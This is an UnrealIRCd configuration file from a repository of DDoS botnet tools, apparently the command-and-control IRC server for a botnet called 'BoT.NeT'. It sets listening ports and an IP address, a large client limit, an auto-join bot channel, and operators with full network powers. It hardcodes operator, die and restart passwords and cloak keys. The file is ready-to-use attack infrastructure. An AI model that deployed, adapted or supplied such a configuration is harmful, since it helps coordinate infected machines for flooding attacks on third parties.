Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/IRC/unrealircd.conf
5038 views
1
# ########################################
2
# # ME Block #
3
# ########################################
4
me {
5
name "BoT.NeT";
6
info "FaZe.gov";
7
numeric 1;
8
};
9
# ########################################
10
# # Admin Block #
11
# ########################################
12
admin {
13
"FaZe";
14
};
15
# ########################################
16
# # Class Block #
17
# ########################################
18
class clients {
19
pingfreq 150;
20
maxclients 15000;
21
sendq 1000000;
22
recvq 4000;
23
};
24
# ########################################
25
# # Allow Block #
26
# ########################################
27
allow {
28
ip *@*;
29
password "@";
30
hostname *@*;
31
class clients;
32
maxperip 1;
33
};
34
# ########################################
35
# # Listen Block #
36
# ########################################
37
listen *:6667;
38
listen 185.112.249.210:443;
39
listen *:6969;
40
# ########################################
41
# # Operator Block #
42
# ########################################
43
oper B1NARY {
44
class clients;
45
from {
46
userhost *@*;
47
};
48
password "BOATNET";
49
flags
50
{
51
global;
52
services-admin;
53
can_rehash;
54
can_die;
55
can_restart;
56
helpop;
57
can_wallops;
58
can_globops;
59
can_localroute;
60
can_globalroute;
61
can_localkill;
62
can_globalkill;
63
can_kline;
64
can_gzline;
65
can_gkline;
66
can_unkline;
67
can_localnotice;
68
can_globalnotice;
69
netadmin;
70
can_zline;
71
get_umodew;
72
get_host;
73
can_override;
74
};
75
snomask *;
76
maxlogins "3";
77
};
78
oper JR {
79
class clients;
80
from {
81
userhost *astrogam1ing*;
82
};
83
password "BOATNET";
84
flags
85
{
86
global;
87
services-admin;
88
can_rehash;
89
can_die;
90
can_restart;
91
helpop;
92
can_wallops;
93
can_globops;
94
can_localroute;
95
can_globalroute;
96
can_localkill;
97
can_globalkill;
98
can_kline;
99
can_gzline;
100
can_gkline;
101
can_unkline;
102
can_localnotice;
103
can_globalnotice;
104
netadmin;
105
can_zline;
106
get_umodew;
107
get_host;
108
can_override;
109
};
110
snomask *;
111
maxlogins "5";
112
};
113
114
# ########################################
115
# # Settings #
116
# ########################################
117
drpass {
118
restart "notorious98765";
119
die "notorious98765";
120
};
121
set {
122
network-name "BoT.NeT";
123
default-server "irc.BoT.NeT";
124
services-server "services.BoT.NeT";
125
help-channel "#|Help";
126
hiddenhost-prefix "[server]";
127
cloak-keys {
128
// Don't use the same keys
129
"aIRgFoAr1HnF5h5sDb7x4YwA6pW";
130
"P9FdZnR1gl5sJ7hVz4Zb7x4YwpW";
131
"OI8r1ZnR6gl3sJ7hVz4Zb7x4YnX";
132
};
133
hosts {
134
local "BoT.NeT";
135
global "BoT.NeT";
136
coadmin "BoT.NeT";
137
admin "BoT.NeT";
138
netadmin "BoT.NeT";
139
servicesadmin "BoT.NeT";
140
host-on-oper-up "yes";
141
};
142
};
143
set {
144
allowed-nickchars {
145
latin1;
146
};
147
kline-address "[email protected]";
148
modes-on-connect "+xwGi";
149
modes-on-oper "+xwgspH";
150
restrict-usermodes "G";
151
restrict-channelmodes "G";
152
modes-on-join "+mMnust";
153
oper-auto-join "#Botz";
154
155
dns {
156
nameserver 127.0.0.1;
157
timeout 2s;
158
retries 2;
159
};
160
options {
161
hide-ulines;
162
show-connect-info;
163
show-opermotd;
164
allow-part-if-shunned;
165
flat-map;
166
fail-oper-warn;
167
};
168
maxchannelsperuser 30;
169
anti-spam-quit-message-time 1s;
170
static-quit "Client has disconnected from BoT.NeT";
171
oper-only-stats "*";
172
throttle {
173
connections 3;
174
period 5s;
175
};
176
anti-flood {
177
nick-flood 50:60;
178
};
179
spamfilter {
180
ban-time 1s;
181
ban-reason "Spam";
182
virus-help-channel "#sec";
183
};
184
default-bantime "0";
185
};
186
# ##### Modules #####
187
include "help.conf"; include "badwords.channel.conf"; include
188
"badwords.message.conf"; include "badwords.quit.conf"; include
189
"spamfilter.conf"; loadmodule "src/modules/commands.so"; loadmodule
190
"src/modules/cloak.so";
191
# ########################################
192
# # Log Block #
193
# ########################################
194
195
log ircd.log {
196
maxsize 5MB;
197
flags {
198
errors;
199
kills;
200
sadmin-commands;
201
chg-commands;
202
oper-override;
203
spamfilter;
204
kline;
205
tkl;
206
};
207
};
208
# ########################################
209
# # Misc Block #
210
# ########################################
211
ban nick {
212
mask "Skid";
213
reason "Newfag!";
214
};
215
ulines {
216
services.BoT.NeT;
217
stats.BoT.NeT;
218
};
219
tld {
220
mask *@*;
221
motd "motd.conf";
222
rules "rules.conf";
223
opermotd "opermotd.conf";
224
};
225